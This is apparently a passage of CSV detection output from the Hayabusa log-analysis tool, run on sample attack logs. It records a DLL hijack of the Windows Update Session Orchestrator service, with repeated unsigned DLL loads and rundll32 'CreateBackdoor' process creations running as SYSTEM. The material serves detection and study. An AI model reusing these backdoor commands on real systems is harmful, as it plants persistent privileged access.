SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
